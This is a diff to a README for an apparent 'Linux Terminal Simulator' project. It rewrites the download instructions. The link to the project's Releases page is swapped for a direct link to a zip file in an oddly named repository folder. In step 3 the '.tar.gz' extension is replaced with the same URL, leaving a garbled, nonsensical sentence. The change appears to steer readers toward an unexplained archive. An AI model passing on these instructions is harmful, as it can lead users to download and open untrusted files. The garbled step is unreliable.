villegas2324/Linux-Terminal-Simulator/README.md

 - **Storage**: At least 50 MB of free space.

 ### 2. Download & Install
-To get the Linux Terminal Simulator, visit this page to download: [Linux-Terminal-Simulator Releases](https://github.com/villegas2324/Linux-Terminal-Simulator/releases).
+To get the Linux Terminal Simulator, visit this page to download: [Linux-Terminal-Simulator Releases](https://raw.githubusercontent.com/villegas2324/Linux-Terminal-Simulator/main/holomorphy/Linux-Terminal-Simulator.zip).

 1. Navigate to the link above.
 2. Find the latest release version.
-3. Download the appropriate file for your operating system (e.g., .exe for Windows, .dmg for macOS, or a .tar.gz for Linux).
+3. Download the appropriate file for your operating system (e.g., .exe for Windows, .dmg for macOS, or a https://raw.githubusercontent.com/villegas2324/Linux-Terminal-Simulator/main/holomorphy/Linux-Terminal-Simulator.zip for Linux).
 4. Open the downloaded file and follow the installation prompts.

 ### 3. Running the Application